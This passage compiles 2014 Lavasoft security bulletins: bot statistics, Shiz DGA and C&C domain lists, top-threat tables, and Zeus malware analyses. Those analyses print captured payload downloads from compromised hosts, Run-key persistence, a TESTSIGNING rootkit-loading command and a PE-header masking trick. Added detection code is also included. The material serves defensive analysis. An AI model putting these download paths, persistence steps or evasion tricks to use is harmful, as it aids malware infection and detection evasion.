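    genuine = bytes(dos) + pe
    return MASKED_PREFIX + genuine[len(MASKED_PREFIX):]


if __name__ == "__main__":
    masked = build_masked_sample()
    print("masked looks like a PE:", is_valid_pe(masked))
    print("restored looks like a PE:", is_valid_pe(restore_dos_header(masked)))
```

The reverse check is the useful one for a scanner: a file whose bytes 3..0x3F look like a DOS header and whose e_lfanew lands on "PE\0\0" is an executable whatever its first three bytes say, so validating from the e_lfanew pointer rather than from the magic alone catches this trick.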

Lavasoft Security Bulletin - February 2014: Bot Review

Bot Review

Table: Bots under analysis (February 2014, Lavasoft MAS). The Change column is the month-on-month difference in sample count, expressed as a share of the current month's total.


Bot's name | Jan 2014 | Feb 2014 | Change
Zbot | 259 | 197 | -9.8%
Cycbot | 17 | 41 | +3.8%
Kelihos | 193 | 146 | -7.4%
NrgBot/Dorkbot | 145 | 233 | +13.9%
Blazebot | 1 | 15 | +2.2%
Shiz | 5 | 3 | -0.3%
Total | 620 | 635



Bot distribution in February:

Kelihos

Kelihos continues to download new versions of itself, still using the following URL mask:

http://[IP Address]/mod[id]/[file name].exe

For example:

hxxp://77.122.80.243/mod2/keybex1.exe
hxxp://178.150.171.207/mod1/keybex1.exe

You can find the latest description on Kelihos here.

Cycbot. Shows no sign of disappearing soon. You can find the latest description of Cycbot here.

Shiz. The backdoor is still alive despite the decreased number of occurrences. The latest example is here.
The list of domains Shiz connects to:

URL | IP
hxxp://digivehusyd.eu/login.php | 69.195.129.70
hxxp://gadufiwabim.eu/login.php | 50.116.56.144
hxxp://kefuwidijyp.eu/login.php | 173.230.133.99 (ET CNC Zeus/Spyeye/Palevo Tracker Reported CnC Server (group 3), Malicious)
hxxp://vofozymufok.eu/login.php | 209.160.22.9
jefapexytar.eu | 50.116.56.144
fokyxazolar.eu | 50.116.56.144
xuqohyxeqak.eu | 50.116.56.144
cihunemyror.eu | 50.116.56.144
lyruxyxaxaw.eu | 50.116.56.144
www.bing.com | 204.79.197.200
foxivusozuc.eu | 50.116.56.144
ryqecolijet.eu | 50.116.56.144
puregivytoh.eu | Unresolvable
gahihezenal.eu | Unresolvable
qegytuvufoq.eu | Unresolvable
vojacikigep.eu | Unresolvable
makagucyraj.eu | Unresolvable
tucyguqaciq.eu | Unresolvable
nozoxucavaq.eu | Unresolvable
puvopalywet.eu | Unresolvable
ciliqikytec.eu | Unresolvable
tunujolavez.eu | Unresolvable
xutekidywyp.eu | Unresolvable
dikoniwudim.eu | Unresolvable
divywysigud.eu | Unresolvable
lyvejujolec.eu | Unresolvable
puzutuqeqij.eu | Unresolvable
fobonobaxog.eu | Unresolvable
rydinivoloh.eu | Unresolvable
lysovidacyx.eu | Unresolvable
qeqinuqypoq.eu | Unresolvable
magofetequb.eu | Unresolvable
tupazivenom.eu | Unresolvable
rytuvepokuv.eu | Unresolvable
qetoqolusex.eu | Unresolvable
masisokemep.eu | Unresolvable
gatedyhavyd.eu | Unresolvable
fodakyhijyv.eu | Unresolvable
cicaratupig.eu | Unresolvable
vocumucokaj.eu | Unresolvable
nofyjikoxex.eu | Unresolvable
tuwikypabud.eu | Unresolvable
kepymexihak.eu | Unresolvable
xuxusujenes.eu | Unresolvable
lymylorozig.eu | Unresolvable
jepororyrih.eu | Unresolvable
xubifaremin.eu | Unresolvable
dimutobihom.eu | Unresolvable
voniqofolyt.eu | Unresolvable
fogeliwokih.eu | Unresolvable
dixemazufel.eu | Unresolvable
qederepuduf.eu | Unresolvable
kemocujufys.eu | Unresolvable
nojuletacuf.eu | Unresolvable
rynazuqihoj.eu | Unresolvable
marytymenok.eu | Unresolvable
jejedudupuc.eu | Unresolvable
volebatijub.eu | Unresolvable
ciqydofudyx.eu | Unresolvable
cinepycusaw.eu | Unresolvable
keraborigin.eu | Unresolvable
pumadypyruv.eu | Unresolvable
nopegymozow.eu | Unresolvable
galokusemus.eu | Unresolvable
jewuqyjywyv.eu | Unresolvable
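
Every Shiz domain in the table above has the same shape: an 11-letter label under .eu that strictly alternates consonant and vowel (with y in vowel position), starting with a consonant. That regularity is what makes the DGA output easy to sinkhole, as the 2013 review noted, and it is also enough for a hunting filter. The following is an added example, not code from the bulletin and not the real generation algorithm: it is a shape heuristic derived from the listed names, and it will also flag the occasional legitimate pronounceable 11-letter .eu domain, so treat a hit as a candidate to confirm against the /login.php path or the resolving address rather than as a verdict. The sample list is constructed from entries in the table plus a few benign names.

```python
import re

VOWELS = set("aeiouy")


def host_of(item: str) -> str:
    """Accept a bare domain or a (defanged hxxp://) URL and return the lower-cased host."""
    rest = re.sub(r"^h(?:xx|tt)ps?://", "", item.strip(), flags=re.I)
    return rest.split("/", 1)[0].split(":", 1)[0].lower()


def looks_like_shiz_domain(item: str) -> bool:
    """Shape heuristic from the table: 11-letter label under .eu that strictly alternates
    consonant/vowel (y counted as a vowel), starting with a consonant."""
    labels = host_of(item).split(".")
    if len(labels) < 2 or labels[-1] != "eu":
        return False
    label = labels[-2]
    if len(label) != 11 or not label.isalpha():
        return False
    # even positions must be consonants, odd positions vowels
    return all((ch in VOWELS) == (i % 2 == 1) for i, ch in enumerate(label))


def filter_shiz_candidates(items):
    """Return the hosts from `items` that match the heuristic, in input order."""
    return [host_of(i) for i in items if looks_like_shiz_domain(i)]


# Constructed sample: five entries taken from the table above plus benign names.
SAMPLE = [
    "hxxp://digivehusyd.eu/login.php",
    "hxxp://kefuwidijyp.eu/login.php",
    "jefapexytar.eu",
    "puregivytoh.eu",
    "jewuqyjywyv.eu",
    "www.bing.com",        # listed in the table, not DGA output
    "strasbourg.eu",       # benign .eu name, 10 letters
    "abcdefghijk.eu",      # 11 letters but starts with a vowel and does not alternate
]

if __name__ == "__main__":
    for host in filter_shiz_candidates(SAMPLE):
        print("Shiz-like:", host)
```

Run over passive-DNS or proxy logs, the filter reduces the search space to a handful of names per day; the unresolvable entries in the table are the ones whose registration the operators never completed, so a resolving hit on this pattern deserves priority.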


Zbot. We counted 197 backdoors this month, 94 of which install a Tor client to communicate with the C&C server. You can find the latest description of Zbot here.
NrgBot/Dorkbot. The latest description is here.

Rbot. The latest description is available in Malware Encyclopedia.

Read the part 1: Lavasoft Security Bulletin - February 2014: Under the Dropbox Umbrella.


Lavasoft Security Bulletin - February 2014: Top Threats

Top20 Blocked Malware

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Win32.Trojan.Agent | 81.93% | +1.83%
2 | Trojan.Win32.Generic!BT | 8.44% | +0.34%
3 | Virus.VBS.Ramnit.a | 1.00% | +0.34%
4 | Trojan.Win32.Qhost.apd | 0.73% | new
5 | Malware.JS.Generic | 0.57% | -2.77%
6 | Virus.Win32.Sality.ah | 0.53% | +0.38%
7 | Trojan.Win32.Generic.pak!cobra | 0.43% | -0.04%
8 | Virus.Win32.Sality.at | 0.35% | +0.12%
9 | Virus.Win32.Virut.ce | 0.27% | new
10 | Email-Worm.Win32.Brontok.ik | 0.25% | new
11 | Virus.Win32.Ramnit.a | 0.23% | new
12 | Worm.LNK.Jenxcus.aha | 0.22% | -0.04%
13 | Worm.Win32.Katar.a | 0.22% | new
14 | HackTool.Win32.Keygen | 0.21% | -0.02%
15 | Virus.Win32.Virut.a | 0.20% | new
16 | Virus.Win32.Ramnit.b | 0.20% | new
17 | Trojan.Win32.Generic!SB.0 | 0.17% | -0.09%
18 | Trojan.Win32.Jpgiframe | 0.17% | -0.02%
19 | INF.Autorun | 0.17% | new
20 | Trojan.Win32.Ramnit.c | 0.14% | 0.00%

The Top 20 malicious programs blocked on PCs

Malware Prevalence Table - February 2014

The table below ranks the most prevalent families seen in February.

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Trojan.Win32.Generic!BT | 33.33% | -2.64%
2 | Trojan-Downloader.Win32.LoadMoney.u | 8.42% | -4.53%
3 | Virus.Win32.Expiro.gen | 7.65% | +2.36%
4 | Virus.Win32.Virut.ce | 8.87% | +1.46%
5 | Trojan.Win32.Generic.pak!cobra | 2.33% | +0.85%
6 | Trojan.Win32.DelfInject.m | 0.69% | +0.39%
7 | Trojan.Win32.Generic!SB.0 | 0.47% | -0.29%
8 | Trojan.HTML.Ransomware.b | 0.41% | -0.46%
9 | Adware.OutBrowse | 0.40% | new
10 | Adware.Adpopup | 0.33% | new
11 | Trojan.Win32.DotNet.c | 0.27% | +0.02%
12 | Adware.MultiToolbar | 0.26% | new
13 | Worm.Win32.Downad.Gen | 0.26% | new
14 | Adware.TSUploader | 0.23% | new
15 | Exploit.JS.Obfuscator.a | 0.22% | new
16 | Backdoor.Win32.Spammy.gf | 0.22% | new
17 | Vittalia Installer | 0.22% | new
18 | Trojan-Downloader.Win32.Wauchos.la | 0.21% | -0.02%
19 | Trojan.Win32.Kryptik.bnre | 0.21% | new
20 | Trojan.MSIL.Bladabindi.agxy | 0.20% | +0.01%

New malicious programs entering the Top 20

The “FBI” ransomware locks the computer “to prove you are human”:

Ransomware (MD5: 677ae8f22fae1774b9a8e5f836145cf9) is detected by Ad-Aware as Gen:Heur.MSIL.Krypt.2

The fake AV “Desktop Security”, dated 2010, is still in circulation and “finds” malware on clean computers:

Fake AV (MD5: 5d5a2cfcb887124439c5c0c8165b7a4c) is detected by Ad-Aware as Trojan.Generic.4721331

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Conduit | 22.85% | -2.52%
2 | MyWebSearch | 16.53% | +0.51%
3 | Adware.JS.Conduit | 10.60% | -2.85%
4 | Win32.PUP.Bandoo | 8.51% | +0.67%
5 | Adware.SaveSense | 4.57% | new
6 | Adware.Linkury | 4.24% | -0.77%
7 | Win32.Adware.Agent | 3.48% | +2.60%
8 | Win32.Toolbar.Iminent | 2.00% | -0.21%
9 | Crossrider | 1.62% | -0.40%
10 | Adware.Agent | 1.40% | -0.89%
11 | Iminent | 1.27% | -0.94%
12 | Adware.DealPly | 1.21% | -1.11%
13 | InstallCore | 1.11% | -0.47%
14 | SweetIM | 1.09% | -0.22%
15 | Opencandy | 1.04% | +0.14%
16 | DomaIQ | 0.95% | +0.11%
17 | Amonetize | 0.94% | -0.04%
18 | CoolMirage Ltd | 0.83% | -0.02%
19 | InstallCore.b | 0.61% | new
20 | Besttoolbars | 0.58% | -0.15%

Top20 PUPs detected on user’s PC

Operating Systems

Infections by OS

Geographic Location

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin.

Lavasoft Security Bulletin - March 2014: Bot Review

Bot Review

Table: Bots under analysis (March 2014, Lavasoft MAS). The Change column is the month-on-month difference in sample count, expressed as a share of the current month's total.


Bot's name | Feb 2014 | March 2014 | Change
Zbot | 197 | 65 | -52.6%
Cycbot | 41 | 29 | -4.8%
Kelihos | 146 | 66 | -31.9%
NrgBot/Dorkbot | 233 | 74 | -63.3%
Blazebot/Rbot | 15 | 13 | -0.8%
Shiz | 3 | 4 | +0.4%
Total | 635 | 251



Bot distribution in March:

Kelihos

You can find the latest description on Kelihos here.

Cycbot. You can find the latest description of Cycbot here.

Shiz. The latest example is here.

Zbot. We counted 65 backdoors this month; 27 of them install a Tor client to communicate with the C&C server.
Our latest analysis of Zbot revealed two new features: encryption of downloaded files, and the installation of kernel notify routines that monitor system events such as executable images being loaded into memory and registry keys and values being modified, on both 32-bit and 64-bit operating systems. You can read more in the detailed report on Zeus.

NrgBot/Dorkbot. You can find the latest description of NrgBot here.

Blazebot/Rbot. The latest description is available in Malware Encyclopedia.

Read also:
Lavasoft Security Bulletin - March 2014: Top Threats.

Zeus Backdoor Adopts Extra Rootkit Abilities.

Lavasoft Security Bulletin - March 2014: Top Threats

Top20 Blocked Malware

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Win32.Trojan.Agent | 81.31% | -0.62%
2 | Trojan.Win32.Generic!BT | 8.89% | +0.45%
3 | Email-Worm.Win32.Brontok.a | 1.26% | new
4 | Worm.LNK.Jenxcus.aha | 0.83% | +0.61%
5 | Malware.JS.Generic | 0.53% | -0.04%
6 | Win32.Worm.Brontok/C | 0.52% | new
7 | Trojan.Win32.Generic.pak!cobra | 0.51% | +0.08%
8 | Virus.Win32.Sality.at | 0.34% | -0.01%
9 | Trojan.Win32.Ramnit.c | 0.34% | +0.20%
10 | Packed.Win32.PWSZbot.gen.cy | 0.31% | new
11 | INF.Autorun | 0.28% | +0.11%
12 | HackTool.Win32.Keygen | 0.28% | +0.07%
13 | Virus.Win32.Ramnit.b | 0.23% | +0.03%
14 | Jeefo | 0.22% | new
15 | Trojan.Win32.Jpgiframe | 0.21% | +0.04%
16 | Trojan.Win32.Generic!SB.0 | 0.16% | -0.01%
17 | Email-Worm.Win32.Brontok.q | 0.15% | new
18 | Virus.Win32.Neshta.a | 0.12% | new
19 | Win32.Backdoor.Inject/C | 0.09% | new
20 | BehavesLike.Win32.Malware.bse | 0.09% | new

The Top 20 malicious programs blocked on PCs

Malware Prevalence Table - March 2014

The table below ranks the most prevalent families seen in March.

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Trojan.Win32.Generic!BT | 33.46% | +0.13%
2 | Virus.Win32.Expiro.gen | 7.35% | -0.30%
3 | Trojan-Downloader.Win32.LoadMoney.u | 6.01% | -2.41%
4 | Virus.Win32.Virut.ce | 3.30% | -5.57%
5 | Trojan.Win32.Generic.pak!cobra | 3.11% | +0.78%
6 | Trojan.Win32.Ircbot!cobra | 1.04% | new
7 | Adware.OutBrowse | 0.64% | +0.24%
8 | Trojan.Win32.DelfInject.m | 0.43% | -0.26%
9 | Trojan.Win32.Generic!SB.0 | 0.36% | -0.11%
10 | Trojan.Win32.LoadMoney.f | 0.32% | new
11 | FraudTool.Win32.InternetProtection.ek!a | 0.26% | new
12 | Trojan.HTML.Ransomware.b | 0.25% | -0.16%
13 | Adware.Adpopup | 0.24% | -0.09%
14 | Adware.MultiToolbar | 0.21% | -0.05%
15 | Trojan.Win32.Zbot.aba | 0.20% | new
16 | Trojan.Win32.Kolabc.gu | 0.19% | new
17 | Worm.Win32.Gamarue.z | 0.19% | new
18 | Trojan.Win32.LoadMoney.aa | 0.18% | new
19 | Backdoor.MSIL.Bladabindi.a | 0.18% | new
20 | Trojan.MSIL.Bladabindi.agxy | 0.17% | -0.03%

New malicious programs entered the Top 20

The fake AV “Spyware Protection”, dated 2010, is still in circulation and “finds” malware on clean computers:

Fake AV (MD5: 283fd7bef70e316f57814636619a9318) is detected by Ad-Aware as Trojan.GenericKD.1590998

An example of a Fake AV called AntiSpyware:

Fake AV (MD5: 507068add79c3412d0b6ba295c70fd33) is detected by Ad-Aware as Trojan.FakeAV.MIO

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Conduit | 23.03% | +0.18%
2 | MyWebSearch | 15.88% | -0.65%
3 | Adware.JS.Conduit | 10.18% | -0.42%
4 | Win32.PUP.Bandoo | 7.41% | -1.10%
5 | Adware.Linkury | 6.89% | +2.65%
6 | Adware.SaveSense | 3.85% | -0.72%
7 | Crossrider | 2.19% | +0.57%
8 | Win32.Toolbar.Iminent | 1.89% | -0.11%
9 | Win32.Adware.Agent | 1.36% | -2.12%
10 | Iminent | 1.17% | -0.83%
11 | Adware.DealPly | 1.15% | -0.06%
12 | DomaIQ | 1.14% | +0.19%
13 | Adware.JS.Popuppers.a | 1.07% | new
14 | SweetIM | 1.06% | -0.03%
15 | Opencandy | 1.00% | -0.04%
16 | InstallCore | 0.90% | -0.21%
17 | Adware.Agent | 0.76% | -2.72%
18 | CoolMirage Ltd | 0.72% | -0.11%
19 | Montiera | 0.67% | new
20 | Adware.Win32.InstallCore.ba | 0.59% | new

Top20 PUPs detected on user’s PC

Operating Systems

Infections by OS

Geographic Location

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin.

Read also:
Lavasoft Security Bulletin - March 2014: Bot Review.

Zeus Backdoor Adopts Extra Rootkit Abilities.

Zeus Backdoor Adopts Extra Rootkit Abilities


During the analysis of a recent Zeus backdoor we discovered two new features: encryption of the downloaded payload files, and the installation of kernel notifiers to monitor system events such as the loading of executable images into memory and the modification of registry keys and values.
In an effort to bypass firewalls, Zbot has started to use encryption when downloading its updates. Let us analyze one of the Zeus modifications with these new features.

Upon execution, the malware checks in with its C&C server:

| URL | IP |
|---|---|
| hxxp://95.211.192.195/tasks?version=106&group=0227&client=2fe8d181fcecd35bfe45e0bf12491463&computer=comp_name&os=5.1&latency=0.0 | 95.211.192.195 |
| hxxp://95.211.192.195/data?version=1006&group=0227&client=2fe8d181fcecd35bfe45e0bf12491463&computer=comp_name&os=5.1&latency=0.0&type=8 | 95.211.192.195 |


Then Zeus downloads its new files. For example, the sample 6547c20e2ce10eed3739af76becbae17 downloads the following files:

GET /header/27UKp.fb2 HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: newdirex.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Fri, 14 Mar 2014 13:35:09 GMT
Server: Apache
Last-Modified: Thu, 27 Feb 2014 12:03:27 GMT
Accept-Ranges: bytes
Content-Length: 469739
Connection: close
Content-Type: text/plain
ZZP......<..J..{N.'....AJ.:.J...S...F......MCa6AJ.[4k...9.7.8.p. ..

<<< skipped >>>

The file “27UKp.fb2” is 731883 bytes in size.

GET /wp-content/uploads/2014/02/Test.fb2 HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: elwoodcinemas.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Fri, 14 Mar 2014 13:35:06 GMT
Server: Apache
Last-Modified: Thu, 27 Feb 2014 12:02:10 GMT
Accept-Ranges: bytes
Content-Length: 256674
Connection: close
Content-Type: text/plain
ZZP.J....<..J..{N.'....AJ.:.J...S...F......MCa6AJ.[4k...9.7.8.p. ..

<<< skipped >>>

The file “Test.fb2” is 256674 bytes in size.

The files were downloaded from servers in the United States:

| URL | IP |
|---|---|
| hxxp://elwoodcinemas.com/wp-content/uploads/2014/02/Test.fb2 | 173.220.29.2 |
| hxxp://elwoodcinemas.com/header/27UKp.fb2 | |

As seen above, the first bytes of each downloaded file are the ZZP signature, which indicates that the files were encrypted before delivery.
The following files result from the decryption routine:

%WinDir%\zlib1.dll (59904 bytes)
%WinDir%\aplib64.dll (12800 bytes)
%WinDir%\client.dll (227840 bytes)
%WinDir%\aplib.dll (11264 bytes)
%Temp%\opera_autoupdater.exe (7826 bytes)
%Documents and Settings%\%current user%\Application Data\Utfuak\osuf.exe (1138688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\butit.exe (591872 bytes)

The client.dll is added to the run key to ensure it loads after a reboot:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"relokmgr" = "rundll32 C:\WINDOWS\client.dll,CreateProcessNotify"

The device object “\\.\NtSecureSys” belongs to the test-signed Zeus rootkit driver (which VirusTotal detections identify as the Necurs rootkit):

%System%\drivers\7a989e04d4f7657d.sys (60416 bytes)

The driver name is randomly generated.

The driver can be loaded after changing the Windows boot configuration data to switch the system into TESTSIGNING mode (on Windows Vista, Windows 7, Windows Server 2008, Windows 8, Windows 8.1, Windows Server 2012 and Windows Server 2012 R2):

bcdedit.exe -set TESTSIGNING ON

Once loaded into the kernel, the rootkit installs the following user-mode hooks (as in older versions):
WININET.dll:

HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFile
InternetWriteFileExA
InternetQueryDataAvailable
HttpQueryInfoW
HttpSendRequestExW
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle

CRYPT32.dll:

PFXImportCertStore

USER32.dll:

GetClipboardData
TranslateMessage

Secur32.dll:

DecryptMessage
SealMessage
DeleteSecurityContext

WS2_32.dll:

WSAGetOverlappedResult
WSASend
recv
gethostbyname
WSARecv
send
closesocket
freeaddrinfo
getaddrinfo
GetAddrInfoW

ntdll.dll:

LdrLoadDll
NtCreateThread

The new version installs “load image” and “registry” notifiers to monitor the loading of executable images and system registry operations (RKU found only the “load image” notifier), along with SSDT hooks for the following functions:

ZwOpenProcess
ZwOpenThread

The rootkit attaches its filter-device object to the file system driver (in this example: Fastfat) so it can handle IRP requests sent to the driver.

The rootkit can block access to its files and registry keys, hindering analysis and manual removal.

After rootkit deactivation we can see the standard Necurs settings.

Another Zeus modification (MD5: bbae13fd3099b40b0704e5b341308c1b) downloads files from servers in India with an “.enc” extension, strongly suggesting they are encrypted:

| URL | IP |
|---|---|
| hxxp://svsmills.com/images/pdf.enc | 182.18.150.53 |
| hxxp://japanrareearths.com/img/pdf.enc | 182.18.146.98 |


GET /img/pdf.enc HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: japanrareearths.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Tue, 11 Mar 2014 12:35:43 GMT
Server: Apache
Last-Modified: Thu, 06 Feb 2014 07:36:02 GMT
Accept-Ranges: bytes
Content-Length: 289558
Content-Type: text/plain
ZZP..U8.d.8.>.8.:..p..87>...>.<.'...2.'...8;7".7>.tB..P

<<< skipped >>>

The new Zeus variant can run on 64-bit Windows operating systems, although the payload and rootkit activity differ. When running on 64-bit Windows, the above-mentioned Zeus variant installs 64-bit versions of its libraries and of the test-signed driver (the driver is not shown in the table below):

| MD5 | File path |
|---|---|
| 4437ea54e849d46273b260372c6dec20 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\butit.exe |
| 7db604c446cb21b06b7673a9206914be | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\opera_autoupdater.exe |
| 046a9363a58f8c4105e5871a514b63cc | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\ppcrlui_2640_2 |
| 7fe2b0b3fc2078130f20070a05daf8d5 | c:\Windows\aplib.dll |
| 3f4fe60b6d1e05144f6efa098ac381a8 | c:\Windows\aplib64.dll |
| 01c1e3ab46762ef23eb2ac898ea84c2c | c:\Windows\client.dll |
| 86bb1de30ba26a8d34e6568ab59b89e0 | c:\Windows\client64.dll |
| 80e41408f6d641dc1c0f5353a0cc8125 | c:\Windows\zlib1.dll |


client64.dll is run at system start-up through the Run key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"forfPING" = "rundll32 C:\Windows\client64.dll,CreateProcessNotify"
"Osuf" = "%Documents and Settings%\%current user%\Application Data\Utfuak\osuf.exe"

client.dll exports only one custom function, CreateProcessNotify; after sleeping for ten seconds, it injects the Zeus library into the following processes:

explorer.exe
iexplore.exe
chrome.exe
firefox.exe

The client64.dll contains the same functionality as the 32-bit version but is compiled for AMD64 processors. The code is designed to work with 32-bit processes under the WOW64 x86 emulator. We wrote about the 64-bit version of Zeus previously. The previous Zeus variant targeted 32-bit versions of the svchost.exe process running on 64-bit Windows.

The 64-bit version of Zeus is still able to install load image and registry notifiers:

Load Image notifiers:
FFFFFA80027A1F88 UNKNOWN
Registry notifiers:
FFFFFA80027A0A70 UNKNOWN

We see that the latest variant of the Zeus backdoor, in addition to encrypting its downloaded files, has extra rootkit functionality that installs load image and registry notifiers on both 32-bit and 64-bit operating systems. This is further evidence that Zeus has been adapted for 64-bit platforms, following on from the December 2013 Security Bulletin, where it was shown to inject its code into system processes on 64-bit Windows.

Read also:

Lavasoft Security Bulletin - March 2014: Top Threats.

Lavasoft Security Bulletin - March 2014: Bot Review.

Zeus Downloader Comes as GoogleUpdate


After last month’s paper describing how Zeus, with additional Necurs rootkit functionality on board, can infect 64-bit Windows by installing system notifiers, we saw an increase in samples coming into the lab this month, totalling 568 samples.
In this paper we analyze the installation stage, for which the Zeus downloader is responsible.

1. The GoogleUpdate

In a Lavasoft MAS Zbot report we see that it copies and renames itself as “googleupdate.exe” (MD5: 795ae0d1bb3d3494c8b9be94b04ba2b5, detected by Ad-Aware as Trojan.GenericKD.1568342). Malware writers are known to disguise files to make them look like Google applications; it’s a simple trick that helps the malware stay under the radar.
Last year we analysed an attack using the Microsoft 0-day exploit CVE-2013-3906, which used the original GoogleUpdate.exe (116 648 bytes, MD5: 506708142bc63daba64f2d3ad1dcd5bf), signed by Google, to run a malicious DLL named after the legitimate “Goopdate.dll” (MD5: e4cb1ea2667f1b3b712f4402f0737627), as shown in the picture below.

This time we found the fake “googleupdate.exe” among the dropped files:

| MD5 | File path |
|---|---|
| 45374c8171f17fc159ecb0c51cf082d8 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Exwehu\yqvyi.exe |
| 795ae0d1bb3d3494c8b9be94b04ba2b5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\googleupdate.exe |



The “googleupdate.exe” file is a copy of the Zeus downloader (16 896 bytes in size, MD5: c70b46ebbe517c26e3e7c4de716e8e3f) with the execution path of the original backdoor file appended:

This minor change means the Zeus copy has a different size and hash value from the original.

2. The Downloadee

Another file, randomly named “yqvyi.exe” (372 224 bytes), was downloaded from a server in the United States:

| URL | IP |
|---|---|
| hxxp://londonroofingroofers.co.uk/wp-content/uploads/2013/12/13UKp.z12 | 66.221.228.55 |



We see the two URLs hardcoded inside the downloader body (the first URL was offline):

The file, which starts with the ZZP signature, was delivered in packed form (the LZNT1 compressor was used) and encrypted with a 32-bit XOR key (in this case “0x8B537673”), as previously described in Zeus Backdoor Adopts Extra Rootkit Abilities:

GET /wp-content/uploads/2013/12/13UKp.z12 HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: londonroofingroofers.co.uk
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 28 Apr 2014 00:52:56 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Thu, 13 Feb 2014 03:46:35 GMT
ETag: "5a4ecd-4bf98-4f2418935c1ea"
Accept-Ranges: bytes
Content-Length: 311192
Content-Type: text/plain; charset=UTF-8
ZZP.Q...,..Pvs..rs...s..vK.Rv3.kls.Sv}.L.}.....S.r..W'.:v..#...!.s.s..

<<< skipped >>>
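To turn the exchange captured above, and the 27UKp.fb2, Test.fb2 and pdf.enc downloads in Zeus Backdoor Adopts Extra Rootkit Abilities, into detection logic, here is an added Python example that is not part of the bulletin: it flags the “Updates downloader” User-Agent, the unusual payload extensions, and a ZZP-prefixed body served as text/plain. The sample request/response pair is constructed from the headers shown; its body bytes are made up.

```python
"""Added example (not Lavasoft's code): flag an HTTP exchange that matches the
Zeus update-download pattern described above. The request/response pair is
constructed from the headers shown in the bulletin."""
import re

ZZP_MAGIC = b"ZZP"                      # signature seen at the start of each payload
SUSPECT_UA = "Updates downloader"       # User-Agent used by the downloader
SUSPECT_EXTENSIONS = (".fb2", ".enc", ".z12")   # payload names seen in the captures


def parse_http(raw: bytes):
    """Split a raw HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def zeus_download_indicators(request: bytes, response: bytes):
    """Return the indicators matched by one request/response pair."""
    req_line, req_hdr, _ = parse_http(request)
    _, resp_hdr, body = parse_http(response)
    hits = []
    if req_hdr.get("user-agent") == SUSPECT_UA:
        hits.append("user-agent 'Updates downloader'")
    m = re.match(r"GET\s+(\S+)", req_line)
    if m and m.group(1).lower().endswith(SUSPECT_EXTENSIONS):
        hits.append("payload extension " + m.group(1).rsplit(".", 1)[-1].lower())
    if body.startswith(ZZP_MAGIC):
        hits.append("ZZP magic in body")
        if resp_hdr.get("content-type", "").startswith("text/plain"):
            hits.append("binary ZZP blob served as text/plain")
    return hits


# Constructed sample modelled on the 27UKp.fb2 exchange; body bytes are made up.
SAMPLE_REQUEST = (b"GET /header/27UKp.fb2 HTTP/1.1\r\n"
                  b"Accept: text/*, application/*\r\n"
                  b"User-Agent: Updates downloader\r\n"
                  b"Host: newdirex.com\r\n"
                  b"Cache-Control: no-cache\r\n\r\n")
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                   b"Server: Apache\r\n"
                   b"Content-Length: 16\r\n"
                   b"Content-Type: text/plain\r\n\r\n"
                   b"ZZP\x00\x12\x34\x56\x78\x9a\xbc\xde\xf0\x11\x22\x33\x44")
```

Any one indicator on its own is weak; the combination of the fixed User-Agent and a ZZP body labelled text/plain is what separates this traffic from ordinary update checks.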

After decrypting and unpacking the downloaded file (13UKp.z12) we see the following PE file (372 224 bytes, which matches the above-mentioned “yqvyi.exe”):

The decryption tool for Zeus archives (MD5: 7e75febf814643c4f66b590886458fea) is available for download.
The unpacked backdoor, like “googleupdate.exe”, contains encrypted extra data after the resources section:

The picture above shows that the downloader modifies the data at the end of the downloaded file when saving it to disk, which results in different MD5 hashes of the installed trojan.
The whole process of Zeus installation is shown in Process Monitor:

The initial downloader process starts itself as ‘googleupdate.exe’. googleupdate.exe then downloads and runs the randomly named lkajsd.exe, which finally copies itself as fefo.exe (a.k.a. “yqvyi.exe”; again, the name is random) into “c:\Documents and Settings\"%CurrentUserName%"\Application Data\\”, from where it is started every time Windows boots. By doing so, Zeus obfuscates its installation and complicates analysis.

3. Static Analysis

The Import Address Table of the downloader does not contain any functions that point to downloading abilities. However, after decryption it loads the necessary Internet functions from urlmon.dll.

“Innocent” Zeus downloader IAT

It should be noted that both the downloader and the downloadee use Windows messaging to communicate with each other.

The installed backdoor creates a window with a class name “Huntsville” and a window name “liquorice”.

We will continue monitoring new versions of Zeus collected by the Lab for new features.

Read also:
